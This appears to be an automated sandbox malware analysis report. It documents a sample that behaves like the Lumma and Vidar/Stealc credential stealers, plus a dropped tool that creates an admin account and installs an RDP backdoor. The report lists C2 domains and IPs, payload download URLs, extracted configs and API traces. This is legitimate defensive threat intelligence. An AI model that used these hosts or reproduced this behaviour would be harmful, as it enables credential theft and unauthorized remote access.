2024-09-27T00:15:12.490926+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49771	188.114.97.3	443	TCP
2024-09-27T00:15:13.438318+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49773	172.67.162.108	443	TCP
2024-09-27T00:15:14.346648+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49776	188.114.96.3	443	TCP
2024-09-27T00:15:16.089236+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49777	188.114.97.3	443	TCP
2024-09-27T00:15:18.168845+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49779	172.67.208.139	443	TCP
2024-09-27T00:15:20.558599+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49781	172.67.128.144	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:12.983938+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.4	49773	172.67.162.108	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:13.935923+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.4	49776	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:09.585800+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.4	49768	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:08.654623+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.4	49767	104.21.4.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:10.771432+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.4	49770	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:16.707368+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.4	49779	172.67.208.139	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:14.911440+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.4	49777	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:11.885423+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.4	49771	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:07.669123+0200	2056177	1	Domain Observed Used for C2 Detected	192.168.2.4	49766	104.21.36.139	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:16.084795+0200	2054495	1	A Network Trojan was detected	192.168.2.4	49778	45.132.206.251	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:12.494857+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.4	64698	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:13.448159+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.4	63460	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:09.100767+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.4	62977	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:08.163096+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.4	51877	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:10.038406+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.4	56240	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:16.207474+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.4	65108	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:14.396934+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.4	51859	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:11.287488+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.4	49981	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:07.166816+0200	2056176	1	Domain Observed Used for C2 Detected	192.168.2.4	52568	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:33.488655+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49743	TCP
2024-09-27T00:15:46.345317+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49790	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:34.838625+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49744	TCP
2024-09-27T00:15:47.697227+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.4	49791	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:14:32.132983+0200	2049087	1	A Network Trojan was detected	192.168.2.4	49742	5.75.211.162	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:35.086446+0200	2803305	3	Unknown Traffic	192.168.2.4	49783	104.26.13.205	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:15:06.278834+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49764	147.45.44.104	80	TCP
2024-09-27T00:15:08.898249+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49764	147.45.44.104	80	TCP
2024-09-27T00:15:11.279313+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49764	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://5.75.211.162/CGDHJEGHJ	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220577http://147.45.44.104/prog/66f5db9e	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/V3	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dllI	Avira URL Cloud: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dllB	Avira URL Cloud: Label: malware
Source: wallkedsleeoi.shop	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/sqlp.dllV	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869.	Avira URL Cloud: Label: malware
Source: https://fragnantbui.shop/	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/api1	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop:443/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/mozglue.dllX	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/inventory/	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/g	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869	Avira URL Cloud: Label: malware
Source: https://drawzhotdog.shop:443/api:	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	Avira URL Cloud: Label: malware
Source: https://fragnantbui.shop:443/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/:3#	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/freebl3.dlll	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/apiO	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	Avira URL Cloud: Label: malware
Source: http://147.45.44.104	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/.itb	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/api	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/api	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\AFHDGDGIID.exe	Avira: detection malicious, Label: HEUR/AGEN.1311769
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1311769

Found malware configuration

Source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e90840a846d017e7b095f7543cdf2d15"}
Source: 8.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["ghostreedmnu.shop", "wallkedsleeoi.shop", "stogeneratmns.shop", "fragnantbui.shop", "reinforcenh.shop", "gutterydhowi.shop", "drawzhotdog.shop", "offensivedzvju.shop", "vozmeatillu.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\RDP Wrapper\rdpwrap.dll	ReversingLabs: Detection: 54%
Source: C:\ProgramData\GIIIIJDHJE.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5db9e54794_vfkagks[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\AFHDGDGIID.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wallkedsleeoi.shop
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	2_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	2_2_6C0F6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C24A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6C24A9A0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.139:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.4:49787 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
Source:	Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr
Source:	Binary string: costura.costura.pdb.compressedlB^q source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
Source:	Binary string: costura.costura.pdb.compressed source: AFHDGDGIID.exe, 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, AFHDGDGIID.exe.2.dr, 66f5d9ab0d4c7_rdp[1].exe.2.dr
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_NamefullNameGetAdminGroupNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySystem.Security.CryptographyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmptyWj66qRZAtguDUcGmA5
Source:	Binary string: RfxVmt.pdb source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rfxvmt.dll.19.dr, RDPWInst.exe.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2520015830.0000000037B54000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2498836602.000000002BC7A000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2833427275.000000001FE3B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
Source:	Binary string: RfxVmt.pdbGCTL source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rfxvmt.dll.19.dr, RDPWInst.exe.12.dr
Source:	Binary string: c:\rje\tg\ps7uj1z\obj\Release\ojc.pdb source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: AFHDGDGIID.exe, 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, AFHDGDGIID.exe.2.dr, 66f5d9ab0d4c7_rdp[1].exe.2.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	2_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D5C6
